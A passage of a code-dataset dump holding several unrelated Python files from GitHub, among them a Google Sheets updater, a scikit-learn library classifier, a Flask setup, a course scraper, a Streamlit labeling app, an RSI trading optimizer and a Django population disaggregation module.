image=render)\n # img.image = render\n # img.pack()\n\n\nclass PageOne(tk.Frame):\n \"\"\"\n Second page with the live plots\n \"\"\"\n def __init__(self, parent, controller):\n tk.Frame.__init__(self,parent)\n label = ttk.Label(self, text=\"Live data Resource Page\", font=LARGE_FONT)\n label.pack(pady=10, padx=10)\n\n button2 = ttk.Button(self, text=\"Save data & Exit\", command=lambda: history(controller))\n button2.pack(side=tk.BOTTOM,padx=10,pady=10, anchor=tk.S)\n\n button3 = ttk.Button(self, text=\"Stop running\", command=lambda: stop_animation())\n button3.pack(side=tk.TOP,padx=10,pady=10, anchor=tk.S)\n\n canvas = FigureCanvasTkAgg(f, self)\n canvas.draw()\n canvas.get_tk_widget().pack(side=tk.TOP, fill=tk.BOTH, expand= True)\n\n toolbar = NavigationToolbar2Tk(canvas, self)\n toolbar.update()\n canvas._tkcanvas.pack(side=tk.TOP, fill=tk.BOTH, expand=True)\n\n\napp = GuiResourceMonitor()\nani = animation.FuncAnimation(f, animate, 
interval=900)\napp.mainloop()","repo_name":"MateiRadu0499/GUI-Resource-Monitor","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":23135,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"19"} +{"seq_id":"38956408200","text":"from Dicts import mentors_dict\n\nimport httplib2\nimport apiclient.discovery\nfrom oauth2client.service_account import ServiceAccountCredentials\n\nmain_dict = {}\n\n\nCREDENTIALS_FILE = 'creds.json'\nspreadsheet_id = '1Nz_VX7fYU2O_TuM2XtmIRHlvmJofUkD5BnR5tkyw5so'\nspreadsheet_id2 = '1wS0KsOqhX6mf-pPqiisWVaB3hKaiKtj8QwiQnLbJPR8'\ncredentials = ServiceAccountCredentials.from_json_keyfile_name(\n    CREDENTIALS_FILE,\n    ['https://www.googleapis.com/auth/spreadsheets',\n     'https://www.googleapis.com/auth/drive'])\nhttpAuth = credentials.authorize(httplib2.Http())\nservice = apiclient.discovery.build('sheets', 'v4', http=httpAuth)\n# collect the mentor names in insertion order (avoid shadowing the built-in list)\nmentors = [mentors_dict[key] for key in mentors_dict]\n\nresults = service.spreadsheets().values().batchUpdate(spreadsheetId=spreadsheet_id, body={\n    \"valueInputOption\": \"USER_ENTERED\",\n    \"data\": [\n        {\"range\": \"Лист2!A1:A30\",\n         \"majorDimension\": \"COLUMNS\",\n         \"values\": [mentors]},\n    ]\n    }).execute()","repo_name":"user058572/TgBot","sub_path":"Downloads/TrackerBot3/TrackerBot/Tg Bot/p.py","file_name":"p.py","file_ext":"py","file_size_in_byte":1013,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"19"} +{"seq_id":"5781907875","text":"\nimport pickle as pkl\nimport json\nimport numpy as np\nimport os\nimport pandas as pd\n\nfrom scipy.sparse import hstack\nfrom sklearn.multiclass import OneVsRestClassifier\nfrom sklearn.svm import SVC, LinearSVC\nfrom sklearn.preprocessing import MultiLabelBinarizer\nfrom sklearn.feature_extraction.text import CountVectorizer\nfrom transformers import BertTokenizer\n\nfrom hierarchy import map_to_max_level\nfrom modify_spelling import modify_spelling\nfrom utils import get_metrics\n\n\ndef featurize_column(column, threshold_length_features=None, **kwargs):\n    vec = CountVectorizer(**kwargs).fit(column)\n    features = vec.transform(column)\n    # sklearn >= 1.0 renames this method to get_feature_names_out()\n    names = vec.get_feature_names()\n    if threshold_length_features is not None:\n        index = [idx for idx, name in enumerate(names) if len(name) >= threshold_length_features]\n        features, names = features[:, index], [names[idx] for idx in index]\n    return features, names\n\n\ndef tokenize_column(column, tokenizer):\n    return column.apply(lambda row: ' '.join(tokenizer.tokenize(row)))\n\n\ndef process_data(df, tokenizer):\n    joined = [\n        'title_supplement', 'summary',\n        'title_continuing_resource', 'work_info',\n        'work_title','expression_info',\n        'expression_title', \n        'RVK_j', \n        'keyword', 'keyword_loc']\n\n    joined_features, joined_names = featurize_column(\n        tokenize_column(df[joined].fillna('').apply(' '.join, axis=1), tokenizer),\n        # token_pattern=r\"[^\\| ]+\", \n        max_features=5000)\n\n    title_features, title_names = featurize_column(\n        tokenize_column(df['title'].fillna(''), tokenizer),\n        # token_pattern=r\"[^\\| ]+\", \n        max_features=5000)\n\n    publisher_features, publisher_names = featurize_column(\n        tokenize_column(df['publisher'].fillna(''), tokenizer),\n        # token_pattern=r\"[^\\| ]+\",\n        max_features=5000)\n\n    language_features, language_names = featurize_column(\n        tokenize_column(df['language_text'].fillna(''), tokenizer),\n        max_features=1000)\n\n    features = hstack(\n        [joined_features, title_features, publisher_features, language_features])\n    names = 
joined_names + title_names + publisher_names + language_names\n\n return features.tocsr(), names\n\n\nif __name__ == '__main__':\n import argparse\n parser = argparse.ArgumentParser()\n parser.add_argument('--train-data', required=True)\n parser.add_argument('--dev-data', required=True)\n parser.add_argument('--max-level', type=int, default=0)\n parser.add_argument('--label-hierarchy', default='./data/label-hierarchy.tsv')\n parser.add_argument('--output-path', default='./linear_multilabel.preds')\n args = parser.parse_args()\n\n # class Object():\n # pass\n # args = Object()\n # args.label_hierarchy = '../data/label-hierarchy.tsv'\n # args.train_data = '../data/1980_2019_data.train.parquet'\n # args.dev_data = '../data/1980_2019_data.dev.parquet'\n # args.max_level = 2\n\n hierarchy = pd.read_csv(args.label_hierarchy, sep='\\t')\n if args.train_data.endswith('.parquet'):\n train = pd.read_parquet(args.train_data)\n else:\n train = pd.read_csv(args.train_data)\n if args.dev_data.endswith('.parquet'):\n dev = pd.read_parquet(args.dev_data)\n else:\n dev = pd.read_csv(args.dev_data)\n\n # map labels\n if args.max_level > 0:\n mapping = map_to_max_level(hierarchy, args.max_level)\n train['BK_split'] = train['BK_split'].apply(lambda row: tuple(set(map(mapping.get, row))))\n dev['BK_split'] = dev['BK_split'].apply(lambda row: tuple(set(map(mapping.get, row))))\n\n # filter languages\n target_languages = train['language_text'].value_counts()[\n list(train['language_text'].value_counts() > 1000)\n ].keys()\n target_languages = [lang for lang in target_languages if '|' not in lang]\n train = train[train['language_text'].isin(target_languages)]\n dev = dev[dev['language_text'].isin(target_languages)]\n\n tokenizer = BertTokenizer.from_pretrained(\"bert-base-multilingual-uncased\")\n features, names = process_data(pd.concat([train, dev]), tokenizer)\n features = features.tocsr()\n\n train_X, dev_X = features[:len(train)], features[len(train):]\n train_y = train['BK_split'].tolist()\n dev_y = dev['BK_split'].tolist()\n\n mlb = MultiLabelBinarizer()\n y = mlb.fit_transform(train_y + dev_y)\n train_y, dev_y = y[:len(train)], y[len(train):]\n print(\"Training with {} labels\".format(len(mlb.classes_)))\n clf = OneVsRestClassifier(LinearSVC())\n clf.fit(train_X, train_y)\n\n # evaluate\n preds = clf.predict(dev_X)\n print(json.dumps(get_metrics(dev_y, preds)))\n with open(args.output_path, 'wb') as f:\n np.savez(f, preds=preds, dev_y=dev_y, index=dev.index)\n with open(args.output_path + '.label_mapping', 'wb') as f:\n pkl.dump(mlb, f)","repo_name":"morethanbooks/library_classification_rom","sub_path":"code/linear_multilabel.py","file_name":"linear_multilabel.py","file_ext":"py","file_size_in_byte":4832,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"19"} +{"seq_id":"10830951725","text":"\"\"\"Instantiate Flask and set up plugins\"\"\"\n\nimport os\nfrom datetime import timedelta\n\nfrom flask import Flask\n\nfrom flask_session import Session\nfrom tbj_statsapp.config import (\n DevelopmentConfig,\n ProductionConfig,\n TestingConfig,\n)\n\n\nclass ConfigException(Exception):\n \"\"\"Exception raised for invalid configurations\n\n Attributes:\n message -- explanation of why config is invalid\n \"\"\"\n\n def __init__(self, message):\n Exception.__init__(self)\n self.message = message\n\n\n# Grab environment\nFLASK_ENV = os.environ.get(\"FLASK_ENV\", False)\nDEBUG = os.environ.get(\"FLASK_DEBUG\", False)\nTESTING = os.environ.get(\"FLASK_TESTING\", False)\n\nif 
DEBUG:\n config_settings = DevelopmentConfig()\nelif TESTING:\n config_settings = TestingConfig()\nelif not DEBUG and not TESTING:\n config_settings = ProductionConfig()\nelse:\n raise ConfigException(\"Improper environment configured\")\n\n\ndef create_app():\n \"\"\"Create and initialize app according to the config\"\"\"\n app = Flask(__name__)\n app.config.from_object(config_settings)\n\n # Cookie settings - same across all settings\n app.config[\"SESSION_TYPE\"] = \"filesystem\"\n app.config[\"SESSION_PERMANENT\"] = True\n app.config[\"PERMANENT_SESSION_LIFETIME\"] = timedelta(hours=6)\n\n Session(app)\n\n # Route views without Flask blueprints\n with app.app_context():\n from tbj_statsapp import views # noqa: F401\n\n # Setup session\n\n return app\n\n\nif __name__ == \"__main__\":\n create_app().run(debug=True)\n","repo_name":"kaitj/tbj-statsapp","sub_path":"tbj_statsapp/__init__.py","file_name":"__init__.py","file_ext":"py","file_size_in_byte":1515,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"19"} +{"seq_id":"12397763739","text":"#!/usr/bin/env python\n\"\"\"\nPython routines for scraping data from Princeton's registrar.\nby Alex Ogier '13.\n\nKept limping along by Brian Kernighan, with bandaids every year\nas the registrar makes format changes.\n\nModified by TigerPath Team\n\"\"\"\n\nimport re\nimport urllib.request\nfrom http.client import RemoteDisconnected\nfrom bs4 import BeautifulSoup\n\nURL_PREFIX = \"http://registrar.princeton.edu/course-offerings/\"\nCOURSE_URL = URL_PREFIX + \"course_details.xml?courseid={courseid}&term={term}\"\nCOURSE_URL_REGEX = re.compile(r\"courseid=(?P\\d+)\")\n\n\ndef clean(str):\n \"\"\"Return a string with leading and trailing whitespace gone and all other whitespace condensed to a single space.\"\"\"\n return re.sub(\"\\s+\", \" \", str.strip())\n\n\ndef get_course_details(soup):\n \"\"\"Returns a dict of {courseid, area}.\"\"\"\n\n area = clean(soup(\"strong\")[1].findAllNext(text=True)[1]) # balanced on a pinhead\n if re.match(r\"^\\((LA|SA|HA|EM|EC|QR|STN|STL)\\)$\", area):\n area = area[1:-1]\n else:\n area = \"\"\n\n return {\n \"courseid\": COURSE_URL_REGEX.search(\n soup.find(\"a\", href=COURSE_URL_REGEX)[\"href\"]\n ).group(\"id\"),\n \"area\": area, # bwk: this was wrong[1:-1], # trim parens # match.group(1) if match != None else ''\n }\n\n\ndef scrape_page(page):\n \"\"\"Returns a dict containing as much course info as possible from the HTML contained in page.\"\"\"\n soup = BeautifulSoup(page, \"lxml\").find(\n \"div\", id=\"timetable\"\n ) # was contentcontainer\n course = get_course_details(soup)\n return course\n\n\ndef scrape_id(id, TERM_CODE):\n for _ in range(3):\n try:\n page = urllib.request.urlopen(\n COURSE_URL.format(term=TERM_CODE, courseid=id)\n )\n return scrape_page(page)\n except RemoteDisconnected as e:\n print(\"Retrying scraping course id {}\".format(id))\n print(e)\n else:\n break\n else:\n raise Exception(\"Scraping course id {} failed\".format(id))\n","repo_name":"TigerAppsOrg/TigerPath","sub_path":"tigerpath/scraper/scrape_dist_areas.py","file_name":"scrape_dist_areas.py","file_ext":"py","file_size_in_byte":2015,"program_lang":"python","lang":"en","doc_type":"code","stars":16,"dataset":"github-code","pt":"19"} +{"seq_id":"29586850291","text":"import os, sys\nimport streamlit as st\n\nimport draw, utils\nimport SessionState\n\n\ndef gen_page_content(state, df):\n ''' create Streamlit page \n :param state: SessionState object storing cluster data\n :param df: pandas 
DataFrame containing ad data '''\n first_col, _, _, _, last_col = st.beta_columns(5)\n with last_col:\n if st.button('View next cluster'):\n try:\n state.cluster = next(state.gen_clusters)\n state.index += 1\n except StopIteration:\n state.is_stop = True\n\n with first_col:\n st.title('Suspicious Meta-Cluster #{}'.format(state.index+1))\n\n # on first iteration, before button press\n if state.is_first:\n next(state.gen_clusters) # TODO: change once scalable\n state.cluster = next(state.gen_clusters)\n state.index += 1\n state.is_first = False\n\n # if we've processed all clusters, we show a static end page\n if state.is_stop:\n st.header(\"You've finished all examples from this dataset. Thank you!\")\n st.balloons()\n return\n\n # feature generation\n subdf = utils.get_subdf(df, state)\n cluster_features, features, metadata_features = utils.cluster_feature_extract(subdf)\n\n left_col, right_col = st.beta_columns((1.25, 3))\n\n # strip plot with heatmap\n with left_col:\n st.write(utils.BUTTON_STYLE, unsafe_allow_html=True) # allows side-by-side button opts\n radio_val = st.radio('Which view would you like to see?', ['By cluster', 'By metadata'])\n\n top_n_params, chart_params = utils.BY_CLUSTER_PARAMS if radio_val == 'By cluster' \\\n else utils.BY_METADATA_PARAMS\n plot_df = cluster_features if radio_val == 'By cluster' else metadata_features\n\n top_df = utils.top_n(plot_df, **top_n_params)\n st.write(draw.strip_plot(top_df, **chart_params))\n\n # template / ad text visualization\n with right_col:\n label = subdf['LSH label'].value_counts().idxmax()\n start_path = '../InfoShield/results/{}'.format(label)\n start_path = './data/example.pkl'\n if not os.path.exists(start_path):\n start_path = './data/example.pkl'\n draw.templates(start_path)\n\n # hacky way to get padding between columns\n left_col, _, mid_col, _, right_col = st.beta_columns((1, 0.1, 1.5, 0.1, 2))\n\n # meta-cluster stats table\n with left_col:\n st.subheader('Meta-Cluster Stats')\n st.table(utils.basic_stats(subdf, columns))\n\n # display features over time, aggregated forall clusters\n with mid_col:\n select_feature = st.selectbox('Choose a feature to look at over time', [f for f in features if f != 'days'])\n if select_feature:\n st.write(draw.time_series(features, select_feature))\n\n # show map of ad locations\n with right_col:\n st.write(draw.map(subdf))\n\n # Number input boxes take up the whole column space -- this makes them shorter\n st.subheader('Labeling: On a scale of 1 (very unlikely) to 5 (very likely), how likely is this to be...')\n label_cols = st.beta_columns(5)\n\n for col, cluster_type in zip(label_cols, ('Trafficking', 'Spam', 'Scam', 'Drug dealer', 'Other')):\n col.write(draw.labeling_buttons(cluster_type))\n\n \n# Generate content for app\nst.set_page_config(layout='wide', page_title='Meta-Clustering Classification')\nstate_params = {\n 'is_first': True,\n 'index': 0,\n 'cluster': set(),\n 'is_stop': False,\n 'gen_clusters': None\n}\nstate = SessionState.get(**state_params)\n\nwith st.spinner('Processing data...'):\n filename = '../tiny-RANDOM.csv'\n columns = ['phone', 'email', 'social', 'image_id']\n df = utils.read_csv(filename)\n\n if state.is_first:\n graph = utils.construct_metaclusters(utils.filename_stub(filename), df, columns)\n state.gen_clusters = utils.gen_ccs(graph)\n\ngen_page_content(state, 
df)","repo_name":"cfaloutsos/Interactive-Labeling-for-Human-Trafficking","sub_path":"app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":3921,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"19"} +{"seq_id":"24813569591","text":"import numpy as np \nimport cv2\nfrom utils import add_ones\nimport math\n\n\"\"\"\nfx, fy - focal length of the camera in pixel coordinates\ncx, cy - principle point\nD - distortion coefficeints , D = [k1, k2, p1, p2, k3]\n\nby subscribing to the camera/depth/camera_info ros-topic, following parameters are obtained:\n\twidth -> 640\n\theight -> 480\n\tK -> [554.254691191187, 0.0, 320.5, \n\t\t 0.0, 554.254691191187, 240.5,\n\t\t 0.0, 0.0, 1.0]\n\tfx -> 554.254691191187\n\tfy -> 554.254691191187\n\tcx -> 320.5\n\tcy -> 240.5\n\tD -> [0.0, 0.0, 0.0, 0.0, 0.0] \t\n\ndistortion_model: \"plumb_bob\"\nsimple model of radial and tangential distortion\n\"\"\"\n\nclass Camera: \n def __init__(self, width, height, fx, fy, cx, cy, D, fps = 1):\n self.width = width\n self.height = height\n self.fx = fx\n self.fy = fy\n self.cx = cx\n self.cy = cy\n self.D = np.array(D,dtype=np.float32) # np.array([k1, k2, p1, p2, k3]) distortion coefficients \n self.fps = fps \n \n self.is_distorted = np.linalg.norm(self.D) > 1e-10\n\n\n\nclass KinectCamera(Camera):\n def __init__(self, width, height, fx, fy, cx, cy, D, fps = 1):\n super(KinectCamera, self).__init__(width, height, fx, fy, cx, cy, D, fps)\n # K : intrinsic matrix of the camera\n self.K = np.array([[fx, 0,cx],\n [ 0,fy,cy],\n [ 0, 0, 1]])\n self.K_inverted = np.array([[1/fx, 0,-cx/fx],\n [ 0, 1/fy,-cy/fy],\n [ 0, 0, 1]]) \n \n self.u_min, self.u_max = 0, self.width \n self.v_min, self.v_max = 0, self.height \n\n # turn [u,v] -> [x,y,1] -> [x,y] : where x,y are in normalized coordinate system and u,v in pixel coordinate system \n def unproject_points(self, uvs):\n return np.dot(self.K_inverted, add_ones(uvs).T).T[:, 0:2]\n\n # turn [u,v] -> [x,y,z] : Z contains the depth values for each pixels\n def unproject_points_z(self, uvs, Z):\n xyzs = []\n idx_ = []\n for idx in range(uvs.shape[0]):\n z = Z[uvs[idx, 0],uvs[idx, 1]]\n if math.isnan(z) or z==0:\n idx_.append(idx)\n continue\n x = ((uvs[idx, 1] - self.cx) / self.fx) * z\n y = ((uvs[idx, 0] - self.cy) / self.fy) * z\n\n xyzs.append([x, y, z])\n return np.array(xyzs, np.float64), idx_\n\n # turn uvs of Nx2 array into uvs_undistorted of Nx2 \n def undistort_points(self, uvs):\n if self.is_distorted:\n uvs_undistorted = cv2.undistortPoints(np.expand_dims(uvs, axis=1), self.K, self.D, None, self.K) \n return uvs_undistorted.ravel().reshape(uvs_undistorted.shape[0], 2)\n else:\n return uvs \n \n\n \n","repo_name":"ShafeekSaleem/RobotLocalization","sub_path":"src/camera.py","file_name":"camera.py","file_ext":"py","file_size_in_byte":2888,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"39"} +{"seq_id":"9198152025","text":"from EMA import total_weight\nfrom collections import deque\n\n# LBB = Lower bound buy\n# UBB = Upper bound buy\n# LBS = Lower bound sell\n# UBS = Upper bound sell\n\n# Optimizes both the length and bound\ndef complete_optimization(data, length, LBB, UBB, LBS, UBS):\n # Initialize data\n PREV_length, PREV_LBB, PREV_UBB, PREV_LBS, PREV_UBS = -1,-1,-1,-1,-1\n UNSTABLE = (length != PREV_length or LBB != PREV_LBB or UBB != PREV_UBB or PREV_LBS != LBS or PREV_UBS != UBS)\n\n while UNSTABLE:\n PREV_length = length\n PREV_LBB = LBB\n PREV_UBB = UBB\n PREV_LBS = LBS\n 
PREV_UBS = UBS\n\n length, profit = length_optimization(data, LBB, UBB, LBS, UBS)\n LBB, UBB, LBS, UBS, profit = bound_optimization(data, length)\n\n UNSTABLE = (length != PREV_length or LBB != PREV_LBB or UBB != PREV_UBB or PREV_LBS != LBS or PREV_UBS != UBS)\n \n return {\"profit\": profit, \"length\": length, \"LBB\": LBB, \"UBB\" : UBB, \"LBS\" : LBS, \"UBS\": UBS}\n\n# Optimizes the length \ndef length_optimization(data, LBB, UBB, LBS, UBS): #length is temporary\n # Initialize data\n MAX_profit, OPT_length = -1, -1\n\n for length in range(7, 25):\n RSI, gains, loss = initialize(data, length)\n balance, num_of_trades = trading(data, RSI, gains, loss, length, LBB, UBB, LBS, UBS)\n\n if balance > MAX_profit:\n MAX_profit = balance\n OPT_length = length\n \n return OPT_length, MAX_profit\n\n# Optimizes the bounds\ndef bound_optimization(data, length):\n MAX_profit, OPT_LBB, OPT_UBB, OPT_LBS, OPT_UBS = -1, -1, -1, -1, -1\n LBB_start = 30\n UBB_start = 70\n LBS_start = 45\n UBS_start = 55\n for i in range(16):\n for j in range(16):\n LBB = LBB_start - i\n UBB = UBB_start + i\n LBS = LBS_start - j\n UBS = UBS_start + j\n RSI, gains, loss = initialize(data, length)\n profit, num_of_trades = trading(data, RSI, gains, loss, length, LBB, UBB, LBS, UBS)\n\n if profit > MAX_profit:\n MAX_profit = profit\n OPT_LBB = LBB\n OPT_UBB = UBB\n OPT_LBS = LBS\n OPT_UBS = UBS\n\n return OPT_LBB, OPT_UBB, OPT_LBS, OPT_UBS, MAX_profit\n\n# Initializes the the RSI queue\ndef initialize(data, length):\n gains, loss = deque(maxlen=length), deque(maxlen=length)\n for i in range(1, length+1):\n change = data[i][\"close\"] - data[i-1][\"close\"]\n if change > 0:\n gains.appendleft(change)\n loss.appendleft(0)\n else:\n gains.appendleft(0)\n loss.appendleft(change)\n\n avg_up = RMA(gains, 1)\n avg_down = RMA(loss, 1) + 0.00001\n RS = avg_up / (-1 * avg_down)\n\n RSI = 100 - (100 / (1 + RS))\n return RSI, gains, loss\n\n# RMA function\ndef RMA(data, weight):\n sum = 0\n for i in range(len(data)):\n alpha = 1/(i + 1)\n sum = alpha * data[i] + (1 - alpha) * sum\n return sum\n\n# Calculates the RSI with the next element\ndef calc_next(data, gains, loss, next):\n change = data[next][\"close\"] - data[next - 1][\"close\"]\n if change > 0:\n gains.appendleft(change)\n loss.appendleft(0)\n else:\n gains.appendleft(0)\n loss.appendleft(change)\n\n avg_up = RMA(gains, 1)\n avg_down = RMA(loss, 1) + 0.00001\n RS = avg_up / (-1 * avg_down) \n RSI = 100 - (100 / (1 + RS))\n\n return RSI, gains, loss\n\n# Simulates the trading\ndef trading(data, RSI, gains, loss, length, LBB, UBB, LBS, UBS):\n position = None\n short = -1\n long = 1\n purchases, profit = 0, 0\n for i in range(length, len(data)):\n\n if position == None:\n if RSI < LBB:\n position = long\n profit -= data[i][\"close\"]\n purchases += 1\n\n if RSI > UBB:\n position = short\n profit += data[i][\"close\"]\n purchases += 1\n\n if position == long and RSI > UBS:\n profit += data[i][\"close\"]\n position = None\n\n if position == short and RSI < LBS:\n profit -= data[i][\"close\"]\n position = None\n\n RSI, gains, loss = calc_next(data, gains, loss, i)\n\n if position == long:\n profit += data[len(data) - 1][\"close\"]\n elif position == short:\n profit -= data[len(data) - 1][\"close\"]\n \n return profit, purchases","repo_name":"DenizTekciftci/tradeOptimizer","sub_path":"RSI.py","file_name":"RSI.py","file_ext":"py","file_size_in_byte":4383,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"39"} 
+{"seq_id":"3893972208","text":"import config\nfrom gfx import uniform_sphere, unit, uniform_theta\n\nimport numpy as np\n\nfrom abc import ABCMeta, abstractmethod\n\n\n# Python 3 style metaclass declaration (a bare __metaclass__ attribute is ignored)\nclass Geometry(config.Element, metaclass=ABCMeta):\n    '''\n    A distribution of points and directions. Meant for modelling sensors and\n    emitters.\n    '''\n\n    @abstractmethod\n    def choose(self, rng):\n        '''\n        Pick a random point and direction defined by the geometry.\n\n        Parameters:\n            rng (Random): a random number generator\n\n        Returns:\n            point: numpy.ndarray a point in 3-space on the geometry\n            direction: numpy.ndarray a direction in 3-space on the geometry\n\n        '''\n        raise NotImplementedError\n\n\nclass Ray(Geometry):\n    '''\n    Always returns `origin` and `direction` for `choose()`.\n    '''\n\n    def __init__(self, origin, direction):\n        self.origin = np.asarray(origin)\n        self.direction = np.asarray(direction)\n\n    def choose(self, _):\n        return np.array(self.origin), np.array(self.direction)\n\n    def to_dict(self):\n        return {\n            'type': self.get_type(),\n            'origin': self.origin.tolist(),\n            'direction': self.direction.tolist(),\n        }\n\n\nclass Sphere(Geometry):\n    '''\n    Returns points on the sphere and surface normal at that point. Supports\n    spherical uniform sampling and \"theta-uniform\" sampling.\n\n    Parameters\n    ----------\n\n    radius: float\n        the radius of the sphere\n    center: array of size 3\n        the center of the sphere\n    basis: 3x3 matrix or None\n        a 3d rotation matrix for the sphere; by default the sphere's pole\n        is in the x direction\n    fov: float\n        angle from the pole to support; by default the entire sphere (pi)\n    uniform_in: str\n        sampling strategy; either 'sphere' or 'theta'\n    '''\n\n    def __init__(self, radius, center=(0, 0, 0), basis=None, fov=np.pi,\n                 uniform_in='sphere'):\n        self.center = np.asarray(center)\n        self.radius = radius\n        if basis is None:\n            basis = np.eye(3)\n        self.basis = np.asarray(basis)\n        self.fov = fov\n        self.uniform_in = uniform_in\n\n    def choose(self, rng):\n        if self.uniform_in == 'sphere':\n            xform = np.dot(self.basis, uniform_sphere(rng, self.fov))\n        elif self.uniform_in == 'theta':\n            xform = np.dot(self.basis, uniform_theta(rng, self.fov))\n        else:\n            raise ValueError('Invalid uniform_in value: %s' % self.uniform_in)\n        point = self.center + self.radius * xform\n        direction = unit(point - self.center)\n        return point, direction\n\n    def to_dict(self):\n        return {\n            'type': self.get_type(),\n            'center': self.center.tolist(),\n            # a sphere has no fixed direction attribute; serialize the radius instead\n            'radius': self.radius,\n            'fov': self.fov,\n            'basis': self.basis.tolist(),\n            'uniform_in': self.uniform_in,\n        }\n","repo_name":"BrennenTaylor/Twisty","sub_path":"python/geometry.py","file_name":"geometry.py","file_ext":"py","file_size_in_byte":2927,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"39"} +{"seq_id":"37406562644","text":"from typing import List\n\n\nimport pandas as pd\nimport numpy as np\nfrom django.db import connection, transaction\nfrom django.db.utils import ProgrammingError\nfrom django.db.models import Max, Sum, F\nfrom django.conf import settings\n\nfrom datentool_backend.area.models import Area, AreaLevel\nfrom datentool_backend.population.models import (\n    PopulationRaster,\n    AreaCell,\n    Population,\n    PopulationAreaLevel,\n    AreaPopulationAgeGender,\n    RasterCellPopulationAgeGender,\n    RasterCellPopulation)\nfrom datentool_backend.utils.raw_delete import delete_chunks\nfrom datentool_backend.utils.excel_template import write_template_df\n\nimport logging\nlogger = logging.getLogger('population')\n\n\ndef 
disaggregate_population(population: Population,\n use_intersected_data: bool=False,\n drop_constraints: bool=False):\n areas = population.populationentry_set.distinct('area_id')\\\n .values_list('area_id', flat=True)\n if not areas:\n return 'skipped'\n\n popraster = population.popraster or PopulationRaster.objects.first()\n\n ac = AreaCell.objects.filter(area__in=areas,\n rastercellpop__popraster=popraster)\n\n # if rastercells are not intersected yet\n if ac and use_intersected_data:\n msg = 'use precalculated rastercells\\n'\n else:\n intersect_areas_with_raster(Area.objects.filter(id__in=areas),\n pop_raster=population.popraster)\n msg = f'{len(areas)} Areas intersected with Rastercells.\\n'\n ac = AreaCell.objects.filter(area__in=areas,\n rastercellpop__popraster=population.popraster)\n if not ac:\n return 'no area cells found to intersect with'\n\n # get the intersected data from the database\n df_area_cells = pd.DataFrame.from_records(\n ac.values('rastercellpop__cell_id', 'area_id', 'share_cell_of_area'))\\\n .rename(columns={'rastercellpop__cell_id': 'cell_id', })\n\n # take the Area population by age_group and gender\n entries = population.populationentry_set\n df_pop = pd.DataFrame.from_records(\n entries.values('area_id', 'gender_id', 'age_group_id', 'value'))\n\n # left join with the shares of each rastercell\n dd = df_pop.merge(df_area_cells,\n on='area_id',\n how='left')\\\n .set_index(['cell_id', 'gender_id', 'age_group_id'])\n\n # areas without rastercells have no cell_id assigned\n cell_ids = dd.index.get_level_values('cell_id')\n has_no_rastercell = pd.isna(cell_ids)\n population_not_located = dd.loc[has_no_rastercell].value.sum()\n\n if population_not_located:\n area_levels = population.populationentry_set\\\n .distinct('area__area_level_id')\\\n .values('area__area_level')\n area_level = area_levels[0]['area__area_level']\n\n areas_without_rastercells = Area\\\n .label_annotated_qs(area_level)\\\n .filter(id__in=dd.loc[has_no_rastercell, 'area_id'])\\\n .values_list('_label', flat=True)\n\n msg += f'{population_not_located} Inhabitants not located '\\\n f'to rastercells in {list(areas_without_rastercells)}\\n'\n else:\n msg += 'all areas have rastercells with inhabitants\\n'\n\n # can work only when rastercells are found\n dd = dd.loc[~has_no_rastercell]\n\n # population by age_group and gender in each rastercell\n dd.loc[:, 'pop'] = dd['value'] * dd['share_cell_of_area']\n\n # has to be summed up by rastercell, age_group and gender, because a rastercell\n # might have population from two areas\n df_cellagegender: pd.DataFrame = dd['pop']\\\n .groupby(['cell_id', 'gender_id', 'age_group_id'])\\\n .sum()\\\n .rename('value')\\\n .reset_index()\n\n df_cellagegender['cell_id'] = df_cellagegender['cell_id'].astype('i8')\n df_cellagegender['population_id'] = population.id\n\n # delete the existing entries\n # updating would leave values for rastercells, that do not exist any more\n rc_exist = RasterCellPopulationAgeGender.objects\\\n .filter(population=population)\n delete_chunks(rc_exist, logger)\n\n model = RasterCellPopulationAgeGender\n model_name = model._meta.object_name\n n_rows = len(df_cellagegender)\n logger.debug(f'Schreibe {n_rows:n} Einträge')\n stepsize = settings.STEPSIZE\n for i in np.arange(0, n_rows, stepsize, dtype=np.int64):\n chunk = df_cellagegender.iloc[i:i + stepsize]\n n_inserted = len(chunk)\n write_template_df(chunk, model, logger,\n drop_constraints=drop_constraints,\n log_level=logging.DEBUG)\n logger.info(f'{i + n_inserted:n}/{n_rows:n} 
{model_name}-Einträgen geschrieben')\n\n return msg\n\n\ndef intersect_areas_with_raster(\n areas: List[Area],\n pop_raster: PopulationRaster=None,\n drop_constraints: bool=False):\n '''\n intersect areas with raster creating AreaCells in database,\n already existing AreaCells for areas in this raster are dropped\n '''\n\n if not pop_raster:\n pop_raster = PopulationRaster.objects.first()\n if not pop_raster:\n return\n\n # use only cells with population and put values from Census to column pop\n raster_cells = pop_raster.raster.rastercell_set\n\n raster_cells_with_inhabitants = raster_cells\\\n .filter(rastercellpopulation__isnull=False)\\\n .annotate(pop=F('rastercellpopulation__value'),\n rcp_id=F('rastercellpopulation__id'),\n )\n\n # spatial intersect with areas from given area_level\n area_tbl = Area._meta.db_table\n\n rr = raster_cells_with_inhabitants.extra(\n select={f'area_id': f'\"{area_tbl}\".id',\n f'm2_raster': 'st_area(st_transform(poly, 3035))',\n f'm2_intersect': f'st_area(st_transform(st_intersection(poly, \"{area_tbl}\".geom), 3035))',\n },\n tables=[area_tbl],\n where=[f'''st_intersects(poly, \"{area_tbl}\".geom)\n AND \"{area_tbl}\".id IN %s\n '''],\n params=(tuple(areas.values_list('id', flat=True)),),\n )\n\n # ToDo: do intersection first to check number of areas that intersect with\n # raster, causes error if no area intersects with raster\n try:\n if not rr:\n return\n except ProgrammingError:\n return\n\n df = pd.DataFrame.from_records(\n rr.values('id', 'area_id', 'pop', 'rcp_id',\n 'm2_raster', 'm2_intersect', 'cellcode'))\\\n .set_index(['id', 'area_id'])\n\n df['share_area_of_cell'] = df['m2_intersect'] / df['m2_raster']\n\n # calculate weight as Census-Population *\n # share of area of the total area 